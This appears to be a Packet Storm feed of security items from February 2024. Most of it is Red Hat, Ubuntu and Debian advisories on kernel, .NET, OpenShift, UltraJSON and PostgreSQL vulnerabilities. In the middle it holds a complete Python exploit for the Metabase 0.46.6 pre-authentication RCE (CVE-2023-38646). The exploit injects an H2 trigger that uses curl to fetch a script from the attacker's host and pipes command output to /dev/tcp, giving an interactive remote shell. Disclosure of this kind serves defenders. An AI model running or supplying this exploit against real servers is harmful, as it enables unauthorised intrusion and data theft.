Red Hat Security Advisory 2024-0851-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0851.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:0851-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0851Issue date:         2024-02-15Revision:           03CVE Names:          CVE-2023-4921====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4921References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2245514https://bugzilla.redhat.com/show_bug.cgi?id=2253908

Red Hat Security Advisory 2024-0851-03

Red Hat Security Advisory 2024-0850-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0850.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:0850-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0850Issue date:         2024-02-15Revision:           03CVE Names:          CVE-2024-0646====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0646References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2253908

Red Hat Security Advisory 2024-0850-03

Red Hat Security Advisory 2024-0848-03 - An update for.NET 8.0 is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0848.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 8.0 security updateAdvisory ID:        RHSA-2024:0848-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0848Issue date:         2024-02-15Revision:           03CVE Names:          CVE-2024-21386====================================================================Summary: An update for .NET 8.0 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.102 and .NET Runtime 8.0.2.Security Fix(es):* dotnet: Denial of Service in SignalR server (CVE-2024-21386)* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21386References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263085https://bugzilla.redhat.com/show_bug.cgi?id=2263086https://issues.redhat.com/browse/RHEL-23938

Red Hat Security Advisory 2024-0848-03

Red Hat Security Advisory 2024-0843-03 - Red Hat OpenShift Serverless version 1.31.1 is now available. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0843.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Release of OpenShift Serverless 1.31.1Advisory ID:        RHSA-2024:0843-03Product:            Red Hat OpenShift ServerlessAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0843Issue date:         2024-02-15Revision:           03CVE Names:          CVE-2023-6481====================================================================Summary: Red Hat OpenShift Serverless version 1.31.1 is now available.Red Hat Product Security has rated this update as having a security impact ofCritical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Version 1.31.1 of the OpenShift Serverless Operator is supported on Red HatOpenShift Container Platform versions 4.11, 4.12, 4.13 and 4.14This release includes security, bug fixes, and enhancements.Security Fix(es):* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)* go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients (CVE-2023-49569)* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)* logback: A serialization vulnerability in logback receiver (CVE-2023-6481)For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.31CVEs:CVE-2023-6481References:https://access.redhat.com/security/updates/classification/#criticalhttps://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.31https://bugzilla.redhat.com/show_bug.cgi?id=2252956https://bugzilla.redhat.com/show_bug.cgi?id=2253330https://bugzilla.redhat.com/show_bug.cgi?id=2254210https://bugzilla.redhat.com/show_bug.cgi?id=2258143https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-0843-03

Ubuntu Security Notice 6629-3 - USN-6629-1 fixed vulnerabilities in UltraJSON. This update provides the corresponding updates for Ubuntu 20.04 LTS. It was discovered that UltraJSON incorrectly handled certain input with a large amount of indentation. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jake Miller discovered that UltraJSON incorrectly decoded certain characters. An attacker could possibly use this issue to cause key confusion and overwrite values in dictionaries. It was discovered that UltraJSON incorrectly handled an error when reallocating a buffer for string decoding. An attacker could possibly use this issue to corrupt memory.

==========================================================================  
Ubuntu Security Notice USN-6629-3  
February 14, 2024

ujson vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in UltraJSON.

Software Description:  
- ujson: ultra fast JSON encoder and decoder for Python 3

Details:

USN-6629-1 fixed vulnerabilities in UltraJSON.  
This update provides the corresponding updates for Ubuntu 20.04 LTS.

Original advisory details:

  It was discovered that UltraJSON incorrectly handled certain input with  
  a large amount of indentation. An attacker could possibly use this issue  
  to crash the program, resulting in a denial of service. (CVE-2021-45958)

    Jake Miller discovered that UltraJSON incorrectly decoded certain  
  characters. An attacker could possibly use this issue to cause key  
  confusion and overwrite values in dictionaries. (CVE-2022-31116)

    It was discovered that UltraJSON incorrectly handled an error when  
  reallocating a buffer for string decoding. An attacker could possibly  
  use this issue to corrupt memory. (CVE-2022-31117)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   python3-ujson                   1.35-4ubuntu0.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6629-3  
   https://ubuntu.com/security/notices/USN-6629-1  
   CVE-2022-31116, CVE-2022-31117

Ubuntu Security Notice USN-6629-3

Debian Linux Security Advisory 5623-1 - It was discovered that a late privilege drop in the "REFRESH MATERIALIZED VIEW CONCURRENTLY" command could allow an attacker to trick a user with higher privileges to run SQL commands with these permissions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5623-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 14, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-15  
CVE ID         : CVE-2024-0985

It was discovered that a late privilege drop in the "REFRESH MATERIALIZED  
VIEW CONCURRENTLY" command could allow an attacker to trick a user with  
higher privileges to run SQL commands with these permissions.

For the stable distribution (bookworm), this problem has been fixed in  
version 15.6-0+deb12u1.

We recommend that you upgrade your postgresql-15 packages.

For the detailed security status of postgresql-15 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-15

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXNGWEACgkQEMKTtsN8  
TjaTTA/9HOtLP5LdqTGsquzchn+w+V3WH/WqapW1lw0FZ6UbihaV5E+v1ssef7ty  
Fyr+LsvD7g2gjE6YE+ABGxrYy67rnZWh79TWSK77ReXwzT8Ccz87itxrvUgkVelo  
d0fRlQKWPAtlYOgKAEUcflHzATrf9XJmcr8TdCtISVHAn7kWpdv+kwWUrvp7ZAVm  
Q1rBvTMZKPkP6GRvrSii51FlKaPa8JFmdu9LIPy1WR/ynipxdx3wn/R+hmZ2SHFN  
18KmBd5vAmG8WyvYWGrWx2IntguW0oqC6Lo9pdqgsbC3Uve8RnGfnqP+tLwsB44Q  
82C7uOX3EGDJEAonMXSrgu3jO1v9rjfHF0Gh2Ji6TNmqXwx4bxsMWC6qgqKap4mS  
Y0htECp9juezF9/aaT5zKMynXOpF7U0YmWU5uNW83PZNHJvULYof3SjHvqfnAL6Z  
ZxA5TYcAvm2xD/FFsjzJiLC+hDTCD/nm1R6W/em0qWL7EKhifJFUGjSo5GT8jtc/  
d3dLHPEXAk/SLeXtnSvLmsHIM3T+hl7cmWl37D4tg3XvyztgGC1Blbama81bTAEO  
uj0/ZE+UiMJC2ORywlJljlTlgbaHljBwc3S+H6vaPIDOstDtZLZf46o/x/A2fC97  
Pe59M7w8Salwdp7HZTOIkhFz4cdyMKMb/yd/3jZN9M2jdj6KVao=suSm  
-----END PGP SIGNATURE-----

Debian Security Advisory 5623-1

Debian Linux Security Advisory 5622-1 - It was discovered that a late privilege drop in the "REFRESH MATERIALIZED VIEW CONCURRENTLY" command could allow an attacker to trick a user with higher privileges to run SQL commands with these permissions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5622-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 14, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-13  
CVE ID         : CVE-2024-0985

It was discovered that a late privilege drop in the "REFRESH MATERIALIZED  
VIEW CONCURRENTLY" command could allow an attacker to trick a user with  
higher privileges to run SQL commands with these permissions.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 13.14-0+deb11u1.

We recommend that you upgrade your postgresql-13 packages.

For the detailed security status of postgresql-13 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-13

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXNGV8ACgkQEMKTtsN8  
TjYPYBAAlJuqv8akj+o9j/7gYbpr2LNymLYvhDuHDtHjMMSoT5zBYxCMtKtgc84v  
aEFLrm+1CAejvV+8kOTN8cbFF2CSacfFKDV2/9JJY/dxKZ50QL92QNPnZ6aq7KeM  
/iX8Sqp58dey+/VyNy9S8Mv2fVRN8g7UprR+hBKNyqtMAW7np+C5LUgOLYJc4Iqc  
DPHTTAcMKSYn5vCCQrF7QbCKEzT9KDena7xax6HPR+8F5EI0TIBXL97naslyoLKK  
oHrZPDl7hDUxw+IBYfpcMHZWQCSpCP50OUDnZBcPVRCatbki6pDdM6lymXhDWxbh  
uRlBAUmuPRozP8qrfh+m2EBb2aRDz2QJlmehrY8J+j0tM0dJi1dX34SSqLd3nFyZ  
/24KZoNwkAXbb+OBZD1jsu1IMxWvZm3QhlGRUXnXF7AyJiKQDaOz2b1W9B19Fmm3  
z6bQaEbgGf0MTtT/IpEwDMqGrnkl210KA/qVl1gFSbLETGjPh0rLY8ANuKNLGuDs  
1yPEULUBm0G7ZO7JgjlfMvZLlbNotz0Jl5jKr0uGdT+q8H8NxDUT7UJlDiUNDXm0  
D0LK1vzhr86fGRW9lG8a+OntOpnHPrWbFi5mVTIcuPmd6ekIvOCTeAg6dLliuLcf  
fFlWOUD20Xxsz8M0Xkd4NEAod67bk4NWzbHA0XSVa6M0z2u1lok=Kp2y  
-----END PGP SIGNATURE-----

Debian Security Advisory 5622-1

Metabase version 0.46.6 pre-authentication remote code execution exploit.

    # Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution# Google Dork: N/A# Date: 13-10-2023# Exploit Author: Musyoka Ian# Vendor Homepage: https://www.metabase.com/# Software Link: https://www.metabase.com/# Version: metabase 0.46.6# Tested on: Ubuntu 22.04, metabase 0.46.6# CVE : CVE-2023-38646#!/usr/bin/env python3import socketfrom http.server import HTTPServer, BaseHTTPRequestHandlerfrom typing import Anyimport requestsfrom socketserver import ThreadingMixInimport threadingimport sysimport argparsefrom termcolor import coloredfrom cmd import Cmdimport refrom base64 import b64decodeclass Termial(Cmd):    prompt = "metabase_shell > "    def default(self,args):        shell(args)class Handler(BaseHTTPRequestHandler):    def do_GET(self):        global success        if self.path == "/exploitable":                        self.send_response(200)            self.end_headers()            self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0  > /dev/tcp/{argument.lhost}/{argument.lport}".encode())            success = True        else:            print(self.path)            #sys.exit(1)    def log_message(self, format: str, *args: Any) -> None:        return Noneclass Server(HTTPServer):    passdef run():    global httpserver    httpserver = Server(("0.0.0.0", argument.sport), Handler)    httpserver.serve_forever()def exploit():    global success, setup_token    print(colored("[*] Retriving setup token", "green"))    setuptoken_request = requests.get(f"{argument.url}/api/session/properties")    setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1)    print(colored(f"[+] Setup token: {setup_token}", "green"))    print(colored("[*] Tesing if metabase is vulnerable", "green"))    payload = {        "token": setup_token,        "details":        {            "is_on_demand": False,            "is_full_sync": False,            "is_sample": False,            "cache_ttl": None,            "refingerprint": False,            "auto_run_queries": True,            "schedules":            {},            "details":            {                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;",                "advanced-options": False,                "ssl": True                },                "name": "an-sec-research-musyoka",                "engine": "h2"                }                }    timer = 0    print(colored(f"[+] Starting http server on port {argument.sport}", "blue"))    thread = threading.Thread(target=run, )    thread.start()    while timer != 120:        test = requests.post(f"{argument.url}/api/setup/validate", json=payload)        if success == True :            print(colored("[+] Metabase version seems exploitable", "green"))            break        elif timer == 120:            print(colored("[-] Service does not seem exploitable exiting ......", "red"))            sys.exit(1)    print(colored("[+] Exploiting the server", "red"))        terminal = Termial()    terminal.cmdloop()def shell(command):    global setup_token, payload2    payload2 = {        "token": setup_token,        "details":        {            "is_on_demand": False,            "is_full_sync": False,            "is_sample": False,            "cache_ttl": None,            "refingerprint": False,            "auto_run_queries": True,            "schedules":            {},            "details":            {                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x",                "advanced-options": False,                "ssl": True                },                "name": "an-sec-research-team",                "engine": "h2"                }                }        output = requests.post(f"{argument.url}/api/setup/validate", json=payload2)    bind_thread = threading.Thread(target=bind_function, )    bind_thread.start()    #updating the payload    payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x"    requests.post(f"{argument.url}/api/setup/validate", json=payload2)    #print(output.text)def bind_function():    try:        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.bind(("0.0.0.0", argument.lport))        sock.listen()        conn, addr = sock.accept()        data = conn.recv(10240).decode("ascii")        print(f"\n{(b64decode(data)).decode()}")    except Exception as ex:        print(colored(f"[-] Error: {ex}", "red"))        pass    if __name__ == "__main__":    print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta"))    args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]")    args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True)    args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True)    args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True)    args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True)    argument  = args.parse_args()    if argument.url.endswith("/"):        argument.url = argument.url[:-1]    success = False    exploit()

Metabase 0.46.6 Remote Code Execution

Red Hat Security Advisory 2024-0827-03 - An update for.NET 8.0 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0827.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 8.0 security updateAdvisory ID:        RHSA-2024:0827-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0827Issue date:         2024-02-15Revision:           03CVE Names:          CVE-2024-21386====================================================================Summary: An update for .NET 8.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.102 and .NET Runtime 8.0.2.Security Fix(es):* dotnet: Denial of Service in SignalR server (CVE-2024-21386)* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21386References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263085https://bugzilla.redhat.com/show_bug.cgi?id=2263086https://issues.redhat.com/browse/RHEL-23939

Red Hat Security Advisory 2024-0827-03

Red Hat Security Advisory 2024-0820-03 - Red Hat Advanced Cluster Management for Kubernetes 2.8.5 General Availability release images, which provide security updates and fix bugs. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0820.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: Red Hat Advanced Cluster Management 2.8.5 security and bug fix container updates  
Advisory ID:        RHSA-2024:0820-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0820  
Issue date:         2024-02-15  
Revision:           03  
CVE Names:          CVE-2023-49568  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.8.5 General  
Availability release images, which provide security updates and fix bugs.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.8.5 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.8/html/release_notes/

Security fix(es):  
CVE-2023-49568 go-git: Maliciously crafted Git server replies can cause DoS on  
go-git clients  
CVE-2023-49569 go-git: Maliciously crafted Git server replies can lead to path  
traversal and RCE on go-git clients

Jira issues addressed:

* ACM-7547: Search - AddOnDeploymentConfig toleration is not updated automatically  
* ACM-8415: ACM Policy that applies stringdata in a secret regression with templates  
* ACM-8696: Having baremetalhost.metal3.io in ACM backup results in some issues when restored  
* ACM-8764: Addons not deployed on ACM managed cluster when the managed cluster is imported  
* ACM-8857: credentials restore file is executed after resources restore  
* ACM-8947: Configuration Policy controller unexpectedly gets taken out of uninstall mode  
* ACM-8967: oc get policy still returns NonCompliant 10 minutes after deleting the certificate and secret  
* ACM-9466: cluster detail page optimisations

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.8

CVEs:

CVE-2023-49568

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://issues.redhat.com/browse/ACM-7547  
https://issues.redhat.com/browse/ACM-8415  
https://issues.redhat.com/browse/ACM-8696  
https://issues.redhat.com/browse/ACM-8764  
https://issues.redhat.com/browse/ACM-8857  
https://issues.redhat.com/browse/ACM-8947  
https://issues.redhat.com/browse/ACM-8967  
https://issues.redhat.com/browse/ACM-9466

Tag

#js